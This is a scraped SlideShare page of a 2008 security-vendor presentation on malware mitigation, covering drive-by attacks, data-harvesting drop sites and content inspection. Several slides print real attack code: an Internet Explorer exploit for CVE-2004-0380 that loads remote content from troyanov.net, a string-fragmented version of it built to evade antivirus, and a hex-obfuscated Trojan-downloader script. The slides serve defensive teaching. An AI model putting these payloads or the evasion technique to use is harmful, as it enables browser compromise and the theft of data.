SlideShare una empresa de Scribd logo
1 de 67
Chicago AITP – November 10, 2008 Devising a Strategy to Mitigate Malware Joann K. Davis (O) 847.304.1892 (C) 847.769.3018 [email_address]
This presentation may contain images of websites which have been found to have served web content with embedded crimeware. The depicted reputable websites are NOT part of the crimeware problem described herein. They are in fact targets and victims of the new and sophisticated schemes employed by criminals in the distribution of crimeware that we see emerging today. This presentation uses Finjan as an EXAMPLE of Proactive Web Content Inspection technology and the MCRC as an EXAMPLE of Security Vendor research labs. Disclaimers
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Agenda
[object Object]
McAfee :  the number of keyloggers increased by 250% between January 2004 and May 2006. Phishing attacks increased by 100% only. Symantec :  4.7 million distinct computers are actively used in botnets to spit out spam, launch DoS (denial of service) attacks, install malware or log keystrokes for identity theft Sophos :   Researchers are finding 29,700 new infected Web pages every day, and 80% of them are legitimate sites that have been compromised  Microsoft :  the Malicious Software Removal Tool (MSRT) has removed at least one Trojan from about 3.5 million unique computers. Of the 5.7 million infected Windows machines, about 62 percent was found with a Trojan or bot FBI :  Over One Million victim computers are being actively used for botnets. Growth of Cybercrime Source: AV-Test Labs
Cybercrime Survey Results ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Recent Trends
Evolution of obfuscation
A Recent Attack In April 2008, Finjan’s MCRC discovers a Server being utilized for Criminal purposes in Malaysia. Managing the Deployment and Execution of Crimeware (AdPack) on Infected Machines. ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],In addition, the Server was also being utilized as a Data Aggregation Point or ‘ Drop Site ’ capturing the contents of web-based transactions. The Server was acting as a  Command and Control  Center…
Anatomy of a ‘Drop-Site’ Server Review Stolen Information via Web Interface –  Command and Control Attack Campaigns  target specific groups, regions, and type of data. Logs are grouped by Country. Data is gathered as text and graphic images.
Web-Based Command And Control Execute Commands Against Infected User Machines.
Transaction Details ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Date and Time of Transaction and Domain being accessed. Input Keyed in by User. Username and Passwords are often clearly identifiable. Form data unique to each transaction request. May include information such as Social Security, Phone Numbers, etc. IP Address of the user’s machine. i.e. the infected machine.
What Is Being Harvested? ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Harvested Data:  Full Screen Capture Actual Screenshots Logged to Crimeware Server
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],No Data Is Safe Citrix TM  Login Credentials Logon Credentials to Applications and Systems are compromised.
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],No Data Is Safe Hospital Outlook Web Access (OWA) Logon Credentials Corporate Mail accounts are not Immune.
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],No Data Is Safe Email - Patient History Confidential patient information freely available.
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],No Data Is Safe Online Banking A common target – online banking signon credentials.
Value Depends Upon Who and Where You Are
Web Attacker Toolkits Toolkits Bring Hacking to the Masses Monitor the Success of Your Campaigns
Example of pay-per-infection
Crimeware Where You Least Expect It
Malicious Websites by Category Challenges Traditional URL Filtering
[object Object],[object Object]
A Drive-By Attack An Innocent Free Game Website Simply visit this site to get infected. There is no need to click a link, download or install any software (at least that you are aware of).
A Drive-By Attack An Innocent Free Game Website Exploits our desktop to install a Trojan
A Drive-By Attack Each user session receives a different signature for the same exploit Dynamic Code Obfuscation
[object Object],Berkeley.edu  Serves Up A Drive-by Infection
[object Object],[object Object],Berkeley.edu  Malicious Script Analysis HTML code from the Berkeley site on January 25 th
[object Object],Berkeley.edu  Malicious Script Analysis
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],Berkeley.edu  What the Code Does
[object Object],Berkeley.edu Trojan Traffic Analysis Communication  recorded after infection includes sending of local data
[object Object],Berkeley.edu
[object Object],Berkeley.edu  Reputation-based Security
[object Object],Berkeley.edu
Berkeley.edu  Categorization by URL Filtering Not Categorized as Malicious
Example of Malware using Fragmentation Original malicious page found in the wild  Exploiting a well-known exploit of Internet Explorer described on:  CVE-2004-0380  and  MS04-013 Exploit <html><head></head> <body> <script> try{ document.write('<object data=&quot;&#'+109+';s-its:mhtml'+':'+'file://C:nosuch.mht! http://troyanov.net/001/chm/targ.chm ::/target.htm&quot; type=&quot;text/x-scriptlet&quot;></object>'); catch(e){} </script></body></html>
Detected  by some AV Engines 9 out of 29 Anti-viruses successfully detected the known malicious code  ( www.virustotal.com)
Basic Code Modification Techniques Original malicious page found in the wild – “modified” Without changing the malicious code exploiting IE, we added a simple Javascript command that just add a dummy string. Will the Anti-Virus detect the malicious code….? Added string Fragmented string <html><head></head> <body <script> try{ document.write(‘dummy string’); document.write('<object data=&quot;&#'+109+';s-its:m' + 'h' + 't' + 'ml'+':'+'fi' + 'le://C:nosuch.m' + + 'ht! http://troyanov.net/001/chm/targ.chm ::/target.htm&quot; type=&quot;text/x-scriptlet&quot;></object>'); catch(e){} </script></body></html>
Circumnavigates Signatures and Heuristics 0 out of 29 Anti-viruses detected the known malicious code  ( www.virustotal.com)
How Does It Work? Finjan  Vital Security TM  NG <script> Document.write(“ BAD ”); </script> <script> Document.write(“ BA ”  +  “ D ”); </script> URL Filter Anti- Virus “ BAD ” Internet “ x.com ” Real-time Content Inspection Real-time content inspection technology determines the intent of the script and does not depend upon signatures or reputation of source. Crimeware is embedded in the web page, often unknown to even source servers of high reputation.  Malicious code is blocked at the gateway protecting your system from harm. An employee points his browser to “ x.com” . For business productivity reasons, this site may be blocked. An employee points her browser to “ neededforwork.com” . AV software performs a database scan to match signatures of  known  malicious code.  In this case, a match is found. Crimeware, even the still  unknown  threat, is blocked at the gateway protecting your system from harm. Just seconds later, a request to the same server eludes traditional signature-based detection via dynamic obfuscation techniques. Simple string fragmentation and code obfuscation techniques are used to evade signature-based protection mechanisms. By deconstructing the code to its constituent algorithms, scanner determines the mobile code’s true intent.
Life Without Content Inspection Finjan  Vital Security TM  NG URL Filter Anti- Virus “ BAD ” Internet “ x.com ” Real-time Content Inspection <script> Document.write(“ BA ”  +  “ D ”); </script> Crimeware has infiltrated your environment.  It executes with the same level of authorization as the user who accessed the infected web page. What information is available to that person and now the crimeware? Personnel Information Account Information Intellectual Property Trade Secrets Customer Information Userids/Passwords Financial Reports Customer Lists Payroll Data … Is this Information valuable to you? What could happen without scanning?
Multi-Tiered Protection URL/Reputation Anti-Virus Real-time Content Inspection
Reactive vs. Proactive Conventional Products Protect Against Known Attacks FW , AV, IPS / IDS, URL Next Generation Real-Time Content Inspection Java applet HTML EXE Java Script VB Script ActiveX Mobile Code Layer
Proactive Scanning Technologies ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Web Security Violation Breakdown – Sample Audit Block Access to Spyware Sites Block Application Level Vulnerabilities Block Malicious Scripts by Behavior Block Malicious ActiveX, Java Applets and Executables Block Binary Exploits in Textual Files Block Known Viruses (Kaspersky) White List No Behavior Based Scanning Block Files with Suspicious Multiple Extensions Block Access to Blacklisted URLs Block Spoofed Content Block Potentially Malicious Archives Block Binary Objects with Invalid Digital Certificate Block Microsoft Office Documents containing Macros and/or Embedded Files Block Access to Adware Sites Block IM Tunneling 14,897 8,344 2,500 967 846 781 500 487 392 303 201 168 104 4 1
Example  - Malicious Behavior Detected behavior: Obfuscated Script URL:  www.xrteam.com Code Sample  <body>< script>function xy1q487ded85e3648(q487ded85e3e18){  return (parseInt(q487ded85e3e18,16));}function q487ded85e5588(q487ded85e5d59){  var q487ded85e652f='';q487ded85e846c=String.fromCharCode;for(q487ded85e6cf7=0;q487ded85e6cf7<q487ded85e5d59.length;q487ded85e6cf7+=2){ q487ded85e652f+=(q487ded85e846c(xy1q487ded85e3648(q487ded85e5d59.substr(q487ded85e6cf7,2))));}return q487ded85e652f;} var q487ded85e8c35='3C7363726970743E696628216D796961297B646F63756D656E742E777269746528756E657363617065282027253363253639253636253732253631253664253635253230253733253732253633253364253237253638253734253734253730253361253266253266253734253732253735253635253732253639253665253637253734253666253665253635253733253265253665253635253734253266253733253635253631253732253633253638253265253633253637253639253366253632253631253631253637253639253732253663262532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533322533312533302533362533382532392532622532372536332536332536322533372533382536352533372532372532302537372536392536342537342536382533642533342533362532302536382536352536392536372536382537342533642533342533352533382532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';document.write(q487ded85e5588(q487ded85e8c35));</script> <table width=&quot;790&quot; border=&quot;0&quot; align=&quot;center&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;> Impact:  Attempts to download a Trojan to the desktop (Trojan-Downloader.JS.Agent.ciw )
Malware Example – File Create URL:  http://www.nestle.com/js/WebTrends.js?lwt=8CA0EA3034E6FD4 Code Sample  n = external.menuArguments;  var wsh =  new ActiveXObject (&quot;WScript.Shell&quot;);  var fso = new ActiveXObject(&quot; Scripting.FileSystemObject &quot;);  var tempfolder = fso.GetSpecialFolder(2);  var filename = tempfolder.path + &quot;&quot; + fso.GetTempName();  var file  Impact:  The FileSystemObject object allows a complete control on the local machine disk. The object supports File Read/Write/Create/Delete/Rename/Copy/Query. By using this object, the end-user machine is compromised.
Malware Example – File Write URL:  http://www.talentplusspotlight.com/admin/htmlarea/editor.js Code Sample  heckDocument()  {  oShell= new  ActiveXObject(&quot;WScript.Shell&quot;);  oShell.SendKeys( &quot;^c&quot; ); // copy  oWord =  new ActiveXObject (&quot;Word.Application&quot;);  oWord.Documents.Add();  oWord.Selection.Paste();  oWord.ActiveDocument.CheckSpelling();  oWord.Selec Impact:  The FileSystemObject object allows a complete control on the local machine disk. The object supports File Read/Write/Create/Delete/Rename/Copy/Query. By using this object, the end-user machine is compromised.
Malware Example – File Query URL:  http://www.nestle.com/js/WebTrends.js?lwt=8CA0EA3034E6FD4 Code Sample  veXObject(&quot;WScript.Shell&quot;);  var fso =  new ActiveXObject (&quot; Scripting.FileSystemObject &quot;);  var tempfolder = fso. GetSpecialFolder (2);  var filename = tempfolder.path + &quot;&quot; + fso.GetTempName();  var file = fso.CreateTextFile(filename, true, true);  fi Impact:  The FileSystemObject object allows a complete control on the local machine disk. The object supports File Read/Write/Create/Delete/Rename/Copy/Query. By using this object, the end-user machine is compromised.
Malware Example – Create Process URL:  http://www.talentplusspotlight.com/admin/htmlarea/editor.js Code Sample  heckDocument()  {  oShell= new  ActiveXObject(&quot; WScript.Shell &quot;);  oShell.SendKeys( &quot;^c&quot; ); // copy  oWord = new ActiveXObject(&quot;Word.Application&quot;);  oWord.Documents.Add();  oWord.Selection.Paste();  oWord.ActiveDocument.CheckSpelling();  oWord.Selec Impact:  The WSript.Shell object provides functions to run a program locally, manipulate the contents of the registry, create a shortcut, access to system folder and environment variables, work with the registry and manage shortcuts. By using this object the end-user machine is compromised.
Malware Example – Clipboard Vulnerability Detected behavior: IE Unauthorized Clipboard Contents Disclosure Vulnerability URL:  http://www.hrci.org/dzapps/docs/htmlarea/editor.js Code Sample  else if (cmdID.toLowerCase() == ' paste ') {  editdoc. execCommand ('Paste');  var str=editdoc.body. createTextRange ().htmlText;  if (str.indexOf(&quot;; mso-&quot;)>=0 ||str.indexOf(&quot;<v:&quot;)>=0 ||str.indexOf('class=&quot;Mso')>=0){  myclean(editdoc);  }  editdoc.body.innerHT Impact:  This vulnerability could permit scripting operations to gain access to clipboard contents. This issue employs the execCommand('Paste') method to copy clipboard contents into small (or hidden) textarea. In this manner, security checks performed by the browser are bypassed and the clipboard contents will be copied.
Malware example - iframe ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Example of Potentially Malicious Behavior  Detected behavior: IE Shell.Application Object Script Execution Vulnerability URL:  http://b.adserv.cn/E/J.JS Code Sample  lbEFl0X].substring(1,z1IlbpFl0X[z1IlbEFl0X].length-1));if(z1IlbFFl0X){try{varz1IlcvFl0X=x0r1aW2Z(z1IlbFFl0X,&quot; Shell.Application &quot;);if(z1IlcvFl0X){z1IlctFl0X=z1IlEFl0X(z1IlbFFl0X);returnz1IlctFl0X;}}catch(e){}}z1IlbEFl0X++;}returnfalse;} Malicious Behavior:  The Shell object represents the objects in the Windows Shell. This object expose methods which provides abilities to: Open, explore, and browse for folders; Minimize, restore, cascade, or tile open windows; Launch Control Panel applications; Display system dialog boxes. By using this object, the end-user machine is compromised.
[object Object],[object Object]
Web Monitor module The results of the scan (“ok” or “bad”) are returned to the Web Monitor module where next step processing may include notifying Administrators via Email of the discovery of malicious content on your website. Finjan  Vital Security TM  NG plus Anti-Virus A Web Monitor Module is configured to automatically scan web pages served by your company.  If these pages are found to have been compromised by malicious content, an alert will be sent. Note: the Web Monitor module is custom code . The Web Monitor Module issues an HTTP GET request for every URL your company serves or only those you wish to scan.  Besides being able to monitor the uptime and response time of your web servers, it will scan for crimeware. Using a combination of Anti-Virus and real-time content inspection technologies, the page is scanned for malicious content… Monitoring  Your Web Servers
Web Gateway Security Resources ,[object Object],[object Object],[object Object],[object Object],[object Object]
Vendor Sites ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Example of Vendor Resources
Example of Vendor Blog
Government Security Sites ,[object Object],[object Object],[object Object],[object Object]
Security Industry Sites ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Industry Media Sites ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Industry Media Sites ,[object Object],[object Object],[object Object],[object Object],[object Object]
Industry Blogs ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Books & Publications ,[object Object],[object Object],[object Object]
Questions???

Más contenido relacionado

La actualidad más candente

Fundamentals of Information Systems Security Chapter 13
Fundamentals of Information Systems Security Chapter 13Fundamentals of Information Systems Security Chapter 13
Fundamentals of Information Systems Security Chapter 13Dr. Ahmed Al Zaidy
 
Fundamentals of Information Systems Security Chapter 4
Fundamentals of Information Systems Security Chapter 4Fundamentals of Information Systems Security Chapter 4
Fundamentals of Information Systems Security Chapter 4Dr. Ahmed Al Zaidy
 
Fundamentals of Information Systems Security Chapter 7
Fundamentals of Information Systems Security Chapter 7Fundamentals of Information Systems Security Chapter 7
Fundamentals of Information Systems Security Chapter 7Dr. Ahmed Al Zaidy
 
Fundamentals of Information Systems Security Chapter 5
Fundamentals of Information Systems Security Chapter 5Fundamentals of Information Systems Security Chapter 5
Fundamentals of Information Systems Security Chapter 5Dr. Ahmed Al Zaidy
 
Data Security and Regulatory Compliance
Data Security and Regulatory ComplianceData Security and Regulatory Compliance
Data Security and Regulatory ComplianceLifeline Data Centers
 
Lessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! HackLessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! HackImperva
 
Fundamentals of Information Systems Security Chapter 8
Fundamentals of Information Systems Security Chapter 8Fundamentals of Information Systems Security Chapter 8
Fundamentals of Information Systems Security Chapter 8Dr. Ahmed Al Zaidy
 
introduction to cyber security
introduction to cyber securityintroduction to cyber security
introduction to cyber securitySlamet Ar Rokhim
 
Security and Privacy: What Nonprofits Need to Know
Security and Privacy: What Nonprofits Need to KnowSecurity and Privacy: What Nonprofits Need to Know
Security and Privacy: What Nonprofits Need to KnowTechSoup
 
Introduction to Cyber Security
Introduction to Cyber SecurityIntroduction to Cyber Security
Introduction to Cyber Securitykailash shaw
 
November 2017: Part 6
November 2017: Part 6November 2017: Part 6
November 2017: Part 6seadeloitte
 
Axxera End Point Security Protection
Axxera End Point Security ProtectionAxxera End Point Security Protection
Axxera End Point Security ProtectionShawn Crimson
 

La actualidad más candente (20)

Hacking3e ppt ch13
Hacking3e ppt ch13Hacking3e ppt ch13
Hacking3e ppt ch13
 
Hacking3e ppt ch09
Hacking3e ppt ch09Hacking3e ppt ch09
Hacking3e ppt ch09
 
Fundamentals of Information Systems Security Chapter 13
Fundamentals of Information Systems Security Chapter 13Fundamentals of Information Systems Security Chapter 13
Fundamentals of Information Systems Security Chapter 13
 
Funsec3e ppt ch13
Funsec3e ppt ch13Funsec3e ppt ch13
Funsec3e ppt ch13
 
Hacking3e ppt ch01
Hacking3e ppt ch01Hacking3e ppt ch01
Hacking3e ppt ch01
 
Data breach
Data breachData breach
Data breach
 
Fundamentals of Information Systems Security Chapter 4
Fundamentals of Information Systems Security Chapter 4Fundamentals of Information Systems Security Chapter 4
Fundamentals of Information Systems Security Chapter 4
 
Fundamentals of Information Systems Security Chapter 7
Fundamentals of Information Systems Security Chapter 7Fundamentals of Information Systems Security Chapter 7
Fundamentals of Information Systems Security Chapter 7
 
Fundamentals of Information Systems Security Chapter 5
Fundamentals of Information Systems Security Chapter 5Fundamentals of Information Systems Security Chapter 5
Fundamentals of Information Systems Security Chapter 5
 
Data Security and Regulatory Compliance
Data Security and Regulatory ComplianceData Security and Regulatory Compliance
Data Security and Regulatory Compliance
 
Lessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! HackLessons Learned From the Yahoo! Hack
Lessons Learned From the Yahoo! Hack
 
Hacking3e ppt ch11
Hacking3e ppt ch11Hacking3e ppt ch11
Hacking3e ppt ch11
 
Hacking3e ppt ch04
Hacking3e ppt ch04Hacking3e ppt ch04
Hacking3e ppt ch04
 
Fundamentals of Information Systems Security Chapter 8
Fundamentals of Information Systems Security Chapter 8Fundamentals of Information Systems Security Chapter 8
Fundamentals of Information Systems Security Chapter 8
 
Data Security Breach: The Sony & Staples Story
Data Security Breach: The Sony & Staples StoryData Security Breach: The Sony & Staples Story
Data Security Breach: The Sony & Staples Story
 
introduction to cyber security
introduction to cyber securityintroduction to cyber security
introduction to cyber security
 
Security and Privacy: What Nonprofits Need to Know
Security and Privacy: What Nonprofits Need to KnowSecurity and Privacy: What Nonprofits Need to Know
Security and Privacy: What Nonprofits Need to Know
 
Introduction to Cyber Security
Introduction to Cyber SecurityIntroduction to Cyber Security
Introduction to Cyber Security
 
November 2017: Part 6
November 2017: Part 6November 2017: Part 6
November 2017: Part 6
 
Axxera End Point Security Protection
Axxera End Point Security ProtectionAxxera End Point Security Protection
Axxera End Point Security Protection
 

Similar a Mitigating Malware Presentation Jkd 11 10 08 Aitp

Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing BasicsRick Wanner
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionWayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasAditya K Sood
 
DEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptDEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptschwarz10
 
Discovering the Value of Verifying Web Application Security Using IBM Rationa...
Discovering the Value of Verifying Web Application Security Using IBM Rationa...Discovering the Value of Verifying Web Application Security Using IBM Rationa...
Discovering the Value of Verifying Web Application Security Using IBM Rationa...Alan Kan
 
Get Ready for Web Application Security Testing
Get Ready for Web Application Security TestingGet Ready for Web Application Security Testing
Get Ready for Web Application Security TestingAlan Kan
 
3 Hkcert Trend
3  Hkcert Trend3  Hkcert Trend
3 Hkcert TrendSC Leung
 
LNK Payload exploit in windows
LNK Payload exploit in windowsLNK Payload exploit in windows
LNK Payload exploit in windowsssuser1d7287
 
Secure by design and secure software development
Secure by design and secure software developmentSecure by design and secure software development
Secure by design and secure software developmentBill Ross
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Security
 
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary ReadingThe Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary ReadingMuhammad FAHAD
 
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptxSeceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptxCompanySeceon
 
Are you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weaponsAre you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weaponsBhargav Modi
 
Cyper security & Ethical hacking
Cyper security & Ethical hackingCyper security & Ethical hacking
Cyper security & Ethical hackingCmano Kar
 
Men in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the BrowserMen in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the BrowserSource Conference
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 sebaSebastien Deleersnyder
 
INTERNET SECURITY.pptx
INTERNET SECURITY.pptxINTERNET SECURITY.pptx
INTERNET SECURITY.pptxbabepa2317
 
Briskinfosec - Threatsploit Report Augest 2021- Cyber security updates
Briskinfosec - Threatsploit Report Augest 2021- Cyber security updatesBriskinfosec - Threatsploit Report Augest 2021- Cyber security updates
Briskinfosec - Threatsploit Report Augest 2021- Cyber security updatesBriskinfosec Technology and Consulting
 
Ceh certified ethical hacker
Ceh   certified ethical hackerCeh   certified ethical hacker
Ceh certified ethical hackerbestip
 

Similar a Mitigating Malware Presentation Jkd 11 10 08 Aitp (20)

Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
DEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.pptDEVSECOPS_the_beginning.ppt
DEVSECOPS_the_beginning.ppt
 
Discovering the Value of Verifying Web Application Security Using IBM Rationa...
Discovering the Value of Verifying Web Application Security Using IBM Rationa...Discovering the Value of Verifying Web Application Security Using IBM Rationa...
Discovering the Value of Verifying Web Application Security Using IBM Rationa...
 
Get Ready for Web Application Security Testing
Get Ready for Web Application Security TestingGet Ready for Web Application Security Testing
Get Ready for Web Application Security Testing
 
3 Hkcert Trend
3  Hkcert Trend3  Hkcert Trend
3 Hkcert Trend
 
Information security
Information securityInformation security
Information security
 
LNK Payload exploit in windows
LNK Payload exploit in windowsLNK Payload exploit in windows
LNK Payload exploit in windows
 
Secure by design and secure software development
Secure by design and secure software developmentSecure by design and secure software development
Secure by design and secure software development
 
Cisco Web and Email Security Overview
Cisco Web and Email Security OverviewCisco Web and Email Security Overview
Cisco Web and Email Security Overview
 
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary ReadingThe Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
 
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptxSeceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
Seceon’s Comprehensive Cybersecurity Platform - Seceon.pptx
 
Are you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weaponsAre you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weapons
 
Cyper security & Ethical hacking
Cyper security & Ethical hackingCyper security & Ethical hacking
Cyper security & Ethical hacking
 
Men in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the BrowserMen in the Server Meet the Man in the Browser
Men in the Server Meet the Man in the Browser
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 seba
 
INTERNET SECURITY.pptx
INTERNET SECURITY.pptxINTERNET SECURITY.pptx
INTERNET SECURITY.pptx
 
Briskinfosec - Threatsploit Report Augest 2021- Cyber security updates
Briskinfosec - Threatsploit Report Augest 2021- Cyber security updatesBriskinfosec - Threatsploit Report Augest 2021- Cyber security updates
Briskinfosec - Threatsploit Report Augest 2021- Cyber security updates
 
Ceh certified ethical hacker
Ceh   certified ethical hackerCeh   certified ethical hacker
Ceh certified ethical hacker
 

Último

The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxThe Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptx
The Fit for Passkeys for Employee and Consumer Sign-ins: FIDO Paris Seminar.pptxLoriGlavin3
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
Moving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfMoving Beyond Passwords: FIDO Paris Seminar.pdf
Moving Beyond Passwords: FIDO Paris Seminar.pdfLoriGlavin3
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
What is Artificial Intelligence?????????
What is Artificial Intelligence?????????What is Artificial Intelligence?????????
What is Artificial Intelligence?????????blackmambaettijean
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxLoriGlavin3
 
Training state-of-the-art general text embedding
Training state-of-the-art general text embeddingTraining state-of-the-art general text embedding
Training state-of-the-art general text embeddingZilliz
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rise of the Machines: Known As Drones...
Rise of the Machines: Known As Drones...Rick Flair
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
A Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersA Journey Into the Emotions of Software Developers
A Journey Into the Emotions of Software DevelopersNicole Novielli
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024BookNet Canada
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Sample pptx for embedding into website for demo
Sample pptx for embedding into website for demoSample pptx for embedding into website for demo
Sample pptx for embedding into website for demoHarshalMandlekar2
 

Último (20)

